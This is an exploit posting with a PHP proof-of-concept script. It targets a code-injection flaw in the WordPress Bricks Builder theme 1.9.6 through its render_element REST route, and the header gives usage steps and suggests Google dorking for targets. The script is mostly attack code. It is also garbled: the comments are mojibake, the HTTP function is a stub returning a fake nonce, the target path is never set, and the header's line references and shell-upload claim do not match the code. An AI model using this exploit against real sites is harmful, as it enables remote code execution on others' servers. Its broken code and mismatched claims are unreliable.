=============================================================================================================================================
| # Title     : WordPress Bricks Builder Theme 1.9.6 php code injection Vulnerability                                                       |
| # Author    : indoushka                                                                                                                   |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.2 (64 bits)                                                            |
| # Vendor    : https://bricksbuilder.io/                                                                                                   |
=============================================================================================================================================

POC :

[+] Dorking Ä°n Google Or Other Search Enggine.

[+] The following php code Upload shell file from external link.

[+] Line 53 set your target.

[+] Line 45 set your commands.

[+] Line 68 set your path.

[+] save code as poc.php .

[+] USage : cmd = php poc.php .

[+] PayLoad :

<?php

class MetasploitModule {


    private $info; // Ù…Ø¹Ù„ÙˆÙ…Ø§Øª Ø§Ù„ÙˆØØ¯Ø©
    private $targetUri; // URI Ø§Ù„Ù…Ø³ØªÙ‡Ø¯Ù


    // Ø¯Ø§Ù„Ø© Ù„Ø¬Ù„Ø¨ Ø§Ù„Ù€ Nonce
    private function fetchNonce() {
        // ØªØÙ‚Ù‚ Ù…Ù…Ø§ Ø¥Ø°Ø§ ÙƒØ§Ù†Øª targetUri Ù…ÙØ¹Ø±ÙØ©
        if (empty($this->targetUri['path'])) {
            throw new Exception('Target URI path is not set.');
        }

        // Ø¥Ø±Ø³Ø§Ù„ Ø·Ù„Ø¨ GET Ù„Ø¬Ù„Ø¨ Ø§Ù„Ù€ Nonce
        $response = $this->sendRequest(['method' => 'GET', 'uri' => $this->targetUri['path']]);
        // Ø¥Ø°Ø§ ÙƒØ§Ù†Øª Ø§Ù„Ø§Ø³ØªØ¬Ø§Ø¨Ø© ØºÙŠØ± Ù†Ø§Ø¬ØØ©ØŒ Ù†Ø±Ø¬Ø¹ null
        if ($response['code'] !== 200) return null;

        // Ø§Ø³ØªØ®Ø¯Ø§Ù… Ø§Ù„ØªØ¹Ø¨ÙŠØ± Ø§Ù„Ù†Ù…Ø·ÙŠ Ù„Ø§Ø³ØªØ®Ø±Ø§Ø¬ Ø§Ù„Ù€ Nonce
        preg_match('/"nonce":"([a-f0-9]+)"/', $response['body'], $matches);
        return $matches ? $matches[1] : null; // Ø¥Ø±Ø¬Ø§Ø¹ Ø§Ù„Ù€ Nonce Ø£Ùˆ null Ø¥Ø°Ø§ Ù„Ù… ÙŠØªÙ… Ø§Ù„Ø¹Ø«ÙˆØ± Ø¹Ù„ÙŠÙ‡
    }

    // Ø¯Ø§Ù„Ø© ØªÙ†ÙÙŠØ° Ø§Ù„Ø§Ø³ØªØºÙ„Ø§Ù„
    public function exploit() {
        // Ø¬Ù„Ø¨ Ø§Ù„Ù€ Nonce
        $nonce = $this->fetchNonce();
        if (!$nonce) {
            throw new Exception('Failed to retrieve nonce. Exiting...'); // Ø¥Ø°Ø§ ÙØ´Ù„ Ø¬Ù„Ø¨ Ø§Ù„Ù€ Nonce
        }

        echo "Nonce retrieved: {$nonce}\n"; // Ø·Ø¨Ø§Ø¹Ø© Ø§Ù„Ù€ Nonce Ø§Ù„Ù…Ø³ØªØ®Ø±Ø¬

        // Ø¥Ø¹Ø¯Ø§Ø¯ Ø§Ù„Ø¨ÙŠØ§Ù†Ø§Øª Ù„Ø¥Ø±Ø³Ø§Ù„Ù‡Ø§ ÙÙŠ Ø§Ù„Ø·Ù„Ø¨
        $data = [
            'postId' => rand(1, 10000), // ØªÙˆÙ„ÙŠØ¯ Ù…Ø¹Ø±Ù Ø¹Ø´ÙˆØ§Ø¦ÙŠ
            'nonce' => $nonce, // Ø§Ø³ØªØ®Ø¯Ø§Ù… Ø§Ù„Ù€ Nonce Ø§Ù„Ù…Ø³ØªØ®Ø±Ø¬
            'element' => [
                'name' => 'code',
                'settings' => [
                    'executeCode' => 'true',
                    'code' => "<?php payload ?>" // Ù‡Ù†Ø§ ÙŠØªÙ… ÙˆØ¶Ø¹ Ø§Ù„Ø´ÙŠÙØ±Ø© Ø§Ù„ØªÙŠ Ø³ÙŠØªÙ… ØªÙ†ÙÙŠØ°Ù‡Ø§
                ]
            ]
        ];

        // Ø¥Ø±Ø³Ø§Ù„ Ø§Ù„Ø·Ù„Ø¨ POST Ù„ØªÙ†ÙÙŠØ° Ø§Ù„Ø§Ø³ØªØºÙ„Ø§Ù„
        $this->sendRequest([
            'method' => 'POST',
            'uri' => $this->targetUri['path'] . '/index.php', // URL Ø§Ù„Ù…Ø³ØªÙ‡Ø¯Ù
            'ctype' => 'application/json', // Ù†ÙˆØ¹ Ø§Ù„Ù…ØØªÙˆÙ‰
            'data' => json_encode($data), // ØªØÙˆÙŠÙ„ Ø§Ù„Ø¨ÙŠØ§Ù†Ø§Øª Ø¥Ù„Ù‰ ØµÙŠØºØ© JSON
            'vars_get' => ['rest_route' => '/bricks/v1/render_element'] // Ø§Ù„Ù…Ø¹Ù„Ù…Ø§Øª Ø§Ù„Ø¥Ø¶Ø§ÙÙŠØ©
        ]);
    }

    // Ø¯Ø§Ù„Ø© Ù„Ù…ØØ§ÙƒØ§Ø© Ø§Ù„Ø·Ù„Ø¨Ø§Øª HTTP
    private function sendRequest($options) {
        // Ù‚Ù… Ø¨ØªÙ†ÙÙŠØ° Ù…Ù†Ø·Ù‚ Ø§Ù„Ø·Ù„Ø¨ HTTP Ù‡Ù†Ø§
        return ['code' => 200, 'body' => '{"nonce":"123456"}']; // Ø§Ø³ØªØ¬Ø§Ø¨Ø© Ù…Ø«Ø§Ù„ØŒ ÙŠØ¬Ø¨ Ø§Ø³ØªØ¨Ø¯Ø§Ù„Ù‡Ø§ Ø¨Ø§Ù„Ù…Ù†Ø·Ù‚ Ø§Ù„ÙØ¹Ù„ÙŠ
    }
}

// Ø§Ù„Ø§Ø³ØªØ®Ø¯Ø§Ù…
$targetUri = ['path' => '/path/to/target']; // ØªØ¹ÙŠÙŠÙ† Ù…Ø³Ø§Ø± Ø§Ù„Ù‡Ø¯Ù Ù‡Ù†Ø§
$module = new MetasploitModule([], $targetUri); // ØªÙ…Ø±ÙŠØ± targetUri Ø¹Ù†Ø¯ Ø¥Ù†Ø´Ø§Ø¡ Ø§Ù„ÙƒØ§Ø¦Ù†
try {
    $module->exploit(); // Ù…ØØ§ÙˆÙ„Ø© ØªÙ†ÙÙŠØ° Ø§Ù„Ø§Ø³ØªØºÙ„Ø§Ù„
} catch (Exception $e) {
    echo $e->getMessage(); // Ø·Ø¨Ø§Ø¹Ø© Ø±Ø³Ø§Ù„Ø© Ø§Ù„Ø®Ø·Ø£ Ø¥Ø°Ø§ ØØ¯Ø«Øª
}

?>


Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================